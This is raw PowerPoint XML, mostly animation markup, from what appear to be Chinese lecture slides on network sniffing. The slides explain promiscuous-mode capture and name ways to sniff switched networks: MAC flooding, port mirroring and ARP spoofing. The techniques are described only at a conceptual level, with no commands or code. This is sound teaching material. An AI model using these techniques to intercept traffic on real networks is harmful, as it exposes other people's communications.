                          <p:cTn id="37" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="38" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24585"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24585"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24585"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24585"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24585"/>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7" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24587"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24587"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24587"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24587"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24587"/>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17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24579"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24579"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24579"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24579"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24579"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="17" presetClass="entr" presetSubtype="4" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24586"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24586"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24586"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24586"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24586"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="65" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="66" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24588"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="68" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="24589"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="71" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="72" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2459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6" presetClass="entr" presetSubtype="26" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="37905"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3790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6"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arn(inHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>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37904"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="88" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37904"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="89" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="379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autoUpdateAnimBg="0"/>
      <p:bldP spid="24580" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="24581" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="24582" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="24583" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="24584" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="24585" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="24586" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="24587" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="24588" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="24589" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="24590" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="37904" grpId="0"/>
      <p:bldP spid="37905" grpId="0"/>
      <p:bldP spid="2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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网卡工作在数据链路层</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以帧为单位进行传输</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>帧头含目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址和源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>普通模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网卡只接收与自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址相同的数据包，并将其传递给操作系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>“混杂”模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网卡将所有经过的数据包都传递给操作系统。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163842" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>共享式网络监听原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>模式：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换机按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>端口映射表转发数据包</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>此时只能监听广播数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络监听：须使不应到达的数据包到达本地</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>洪水包：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>交换机发送大量含有虚假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包，使交换机无法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>处理而工作异常，进入“失效”模式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用交换机的镜像功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216066" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>温故而知新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>交换式网络监听原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E28B99C0-D253-4399-9EC5-4C99E0DEA534}"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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>两层网络寻址：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：逻辑地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>电子科技大学</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用于确定路由</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：物理地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>建设北路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
